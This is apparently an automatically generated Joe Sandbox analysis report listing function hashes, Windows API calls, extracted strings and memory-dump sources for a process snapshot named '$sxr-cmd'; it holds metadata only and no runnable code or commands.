                                                                                                            • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                            • Instruction ID: 3965c8189e448f0732ceac253a5494fd058c615bf4303082a89af685c41ba40c
                                                                                                            • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                                            • Instruction Fuzzy Hash: 0C61A461B19E4285EFA1BB65D4101B9A3D1FF84BA4FD54431EA0E2B794DF3ED5288330
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                            • String ID: csm$f
                                                                                                            • API String ID: 2395640692-629598281
                                                                                                            • Opcode ID: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
                                                                                                            • Instruction ID: 47e99bcb04c5f6a857def35871862be1d1c03d96c3f04c60aba2e6e7e4c720bb
                                                                                                            • Opcode Fuzzy Hash: e553a6fcd8766cf47cad89aa0da34990ab2b17b041ac015739fdea2a23d0852d
                                                                                                            • Instruction Fuzzy Hash: C851AA32611A28EAEF14CF15E448F9D77A6F3A2B9DF9181A4FA1747788DB34C849C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                                                            • String ID: %s
                                                                                                            • API String ID: 2401724867-3043279178
                                                                                                            • Opcode ID: dd1cc4c2ac35cbae555720ed0156d711a3be8397f4b57180936ab19164fc0550
                                                                                                            • Instruction ID: 82d5271c9863b8da766b3908454b11bfba1431700e67a34503f5fb4e60ea1d8f
                                                                                                            • Opcode Fuzzy Hash: dd1cc4c2ac35cbae555720ed0156d711a3be8397f4b57180936ab19164fc0550
                                                                                                            • Instruction Fuzzy Hash: 2151D672A09E8285EBA0AF11D8402F9B3A0FB497A4F844135D95D6B794EF3DD45DC730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: iswdigit
                                                                                                            • String ID: GeToken: (%x) '%s'
                                                                                                            • API String ID: 3849470556-1994581435
                                                                                                            • Opcode ID: 916785734c28613ef95a47b0691686ece84d0169728ea5130b23609204428c36
                                                                                                            • Instruction ID: 8c4f9ac6d78bd5d51d576143227fca552b852b359a68d745c16b6ba7cb29355a
                                                                                                            • Opcode Fuzzy Hash: 916785734c28613ef95a47b0691686ece84d0169728ea5130b23609204428c36
                                                                                                            • Instruction Fuzzy Hash: 06518C35A08E4285EBA0AF56A484179B7A0FB58B24F848A35DA5D73790DF7DE49CC330
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF713809A10
                                                                                                            • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF713809994
                                                                                                              • Part of subcall function 00007FF71380A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF713809A82), ref: 00007FF71380A77A
                                                                                                              • Part of subcall function 00007FF71380A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF713809A82), ref: 00007FF71380A839
                                                                                                              • Part of subcall function 00007FF71380A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF713809A82), ref: 00007FF71380A850
                                                                                                            • wcsrchr.MSVCRT ref: 00007FF713809A62
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                                                            • String ID: %s=%s$.
                                                                                                            • API String ID: 3242694432-4275322459
                                                                                                            • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                            • Instruction ID: 9f828556a719654dce4ec49a854334017e212da9f4261f80ed9a91dc16738279
                                                                                                            • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                            • Instruction Fuzzy Hash: E9418221A0DB4285FB90BB11A050279D2D4BF897B0F944230DD9D3B7E5DE7DE46D8230
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7138054E6
                                                                                                            • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF71380552E
                                                                                                              • Part of subcall function 00007FF71380758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF713806999,?,?,?,?,?,00007FF7137F8C39), ref: 00007FF7138075AE
                                                                                                              • Part of subcall function 00007FF71380758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF713806999,?,?,?,?,?,00007FF7137F8C39), ref: 00007FF7138075C6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                                            • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                                            • API String ID: 779401067-630742106
                                                                                                            • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                            • Instruction ID: fb4bba7d88dc5c1278b4d933a6e7b8e0a49a235375ec8501b4bf43424b337e7e
                                                                                                            • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                            • Instruction Fuzzy Hash: 4151A53261CE82C5EBA1AB51E4007FAE3A0EF847A4F944031EA0D6FA55DE3ED419C730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentDirectorytowupper
                                                                                                            • String ID: :$:
                                                                                                            • API String ID: 238703822-3780739392
                                                                                                            • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                            • Instruction ID: 02518537f541203ebb71a2014723d44202cd06e1be108aa376e04ce1a4676126
                                                                                                            • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                            • Instruction Fuzzy Hash: E5110452608A41C6EB65AB62E844279FAE0FF4DBA9FC58132DE0D17790DF3CD04D8724
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                            • API String ID: 3677997916-3870813718
                                                                                                            • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                            • Instruction ID: c7705bee960f2861a60036c0f56a9d4a0685afcc5cd93d77ae50a9870982e3eb
                                                                                                            • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                            • Instruction Fuzzy Hash: 52112872618A45C7EB509B14E48066AFBA0FB8A774F804231DA8D22768EF7DC05CCB20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                            • String ID: \\?\
                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                            • Opcode ID: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
                                                                                                            • Instruction ID: 290bda36b7b10363460701309e55426c61d75bf9a80d99634a073cdcaa2451b5
                                                                                                            • Opcode Fuzzy Hash: b063e99747d40705daecabcc818f010f8e057a4149015bdb718489c079619189
                                                                                                            • Instruction Fuzzy Hash: A4F03172304A55E2FF609B11F4A8BD9A762F7A4B9DFC48064EA494A558DF3CC68CC700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CombinePath
                                                                                                            • String ID: \\.\pipe\
                                                                                                            • API String ID: 3422762182-91387939
                                                                                                            • Opcode ID: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
                                                                                                            • Instruction ID: a2839a94a2f67037f0a9a4c9a3f4fb5f392056b2d1e7b6aa687f784a955ce5c7
                                                                                                            • Opcode Fuzzy Hash: 275731b5076b0e6dc254ebb2ecc66cd3e96493bb62629767b69f00e53740df4b
                                                                                                            • Instruction Fuzzy Hash: A7F05474205F64E1FE004B53B929595E212E798FE9F849170BF5617B18DF38C4498304
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                            • Opcode ID: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
                                                                                                            • Instruction ID: 035f9d8240e9e48b56f7e61549c56a7cb6aa49bf9d130c88b0d6fd767b453fdf
                                                                                                            • Opcode Fuzzy Hash: 998d7d4103a02a9e6d60ca2871a9eec56d3e9844af320b42809f87498ae3ac58
                                                                                                            • Instruction Fuzzy Hash: EEF05E71712F18F2FF444B60F4ACBE8A362ABE8B59F841059BA1B46168DF38C48CC700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2882836952-0
                                                                                                            • Opcode ID: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
                                                                                                            • Instruction ID: 735b8791f0aa28dd1d17a8c933cf3c5d15b5ceac602a02df7245f7a8fa264978
                                                                                                            • Opcode Fuzzy Hash: 09a1da4ea647e200bc3592a5ab7a7466c61b6a393229a681a1c2ded621564b7f
                                                                                                            • Instruction Fuzzy Hash: 5502E632219B94D6EB64CB55E49479AB7A1F3D5B89F500055FA8F83BA8DF7CC448CB00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 2210144848-0
                                                                                                            • Opcode ID: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
                                                                                                            • Instruction ID: 0d485f4d01c76aeb24b70dc29031dfb12d38fded59e27fe02b49124eb84dbb16
                                                                                                            • Opcode Fuzzy Hash: 805c3f4572016d1162eba903c1866f821554d6bcbc59870d2561a84f84d0e957
                                                                                                            • Instruction Fuzzy Hash: 9181C532612E24F9FF50DB608868BED67A2F7E4B9CFC44155FE0A5369ADB348449CB10
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memsetwcsrchr$wcschr
                                                                                                            • String ID:
                                                                                                            • API String ID: 110935159-0
                                                                                                            • Opcode ID: 8db701cdac1b444ee30525db5161909d8125aab0fd237b8664a36cdcc15200a2
                                                                                                            • Instruction ID: 8b48a1b3ab948409af789505733e2c6b97c1fb7bf3b6c49bd0211ea61f4cf156
                                                                                                            • Opcode Fuzzy Hash: 8db701cdac1b444ee30525db5161909d8125aab0fd237b8664a36cdcc15200a2
                                                                                                            • Instruction Fuzzy Hash: FC51D522B09B8285FFA1AB5198447F9A390BF4DBB4F854230CE5D3B784DE3CE55D8220
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$CurrentDirectorytowupper
                                                                                                            • String ID:
                                                                                                            • API String ID: 1403193329-0
                                                                                                            • Opcode ID: b4c5736d36697416d54369b985fffd56fc1a3dd567bd398268ab3e938c2f29e4
                                                                                                            • Instruction ID: a18faea87b83e59774576c814fe9b7cc36728a4f12434e1cd8ed86d2df284dc1
                                                                                                            • Opcode Fuzzy Hash: b4c5736d36697416d54369b985fffd56fc1a3dd567bd398268ab3e938c2f29e4
                                                                                                            • Instruction Fuzzy Hash: 4B51C527A05A8586EBA4AF20D9806B9B7A4FF4C778F858135CA2D17794EF3CD54C8320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 00007FF7137E921C
                                                                                                            • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7137E93AA
                                                                                                              • Part of subcall function 00007FF7137E8B20: wcsrchr.MSVCRT ref: 00007FF7137E8BAB
                                                                                                              • Part of subcall function 00007FF7137E8B20: _wcsicmp.MSVCRT ref: 00007FF7137E8BD4
                                                                                                              • Part of subcall function 00007FF7137E8B20: _wcsicmp.MSVCRT ref: 00007FF7137E8BF2
                                                                                                              • Part of subcall function 00007FF7137E8B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7137E8C16
                                                                                                              • Part of subcall function 00007FF7137E8B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7137E8C2F
                                                                                                              • Part of subcall function 00007FF7137E8B20: wcschr.MSVCRT ref: 00007FF7137E8CB3
                                                                                                              • Part of subcall function 00007FF7137F417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7137F41AD
                                                                                                              • Part of subcall function 00007FF7137F3060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7137E92AC), ref: 00007FF7137F30CA
                                                                                                              • Part of subcall function 00007FF7137F3060: SetErrorMode.KERNELBASE ref: 00007FF7137F30DD
                                                                                                              • Part of subcall function 00007FF7137F3060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7137F30F6
                                                                                                              • Part of subcall function 00007FF7137F3060: SetErrorMode.KERNELBASE ref: 00007FF7137F3106
                                                                                                            • wcsrchr.MSVCRT ref: 00007FF7137E92D8
                                                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7137E9362
                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7137E9373
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                                                            • String ID:
                                                                                                            • API String ID: 3966000956-0
                                                                                                            • Opcode ID: 9ae3b259ec636c1bd328a689641e6129c1d65987d993fbdd2999725aaa90297c
                                                                                                            • Instruction ID: dc881366e4d4f216422a7e48e33c87f1473e15f48eaf1937a56f578e77737717
                                                                                                            • Opcode Fuzzy Hash: 9ae3b259ec636c1bd328a689641e6129c1d65987d993fbdd2999725aaa90297c
                                                                                                            • Instruction Fuzzy Hash: 9D51A332A09F8285EBA1AF21D8902B9A7A4FB4DB64F844135DA0D27794DF3CE55DC320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 2882836952-0
                                                                                                            • Opcode ID: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
                                                                                                            • Instruction ID: 59ea74df5cc15291200e906e16e53076ca92644d0ee45e0b4f006ce752728548
                                                                                                            • Opcode Fuzzy Hash: 98b2d38467aad0f12371f4981a99e71c5d2d9a384676790713b3d681f93ff9b7
                                                                                                            • Instruction Fuzzy Hash: 52612C32119F58DAEB649B15E458B5A77A1F3D9B49F900155FA8F83BA8CB7CC448CF00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
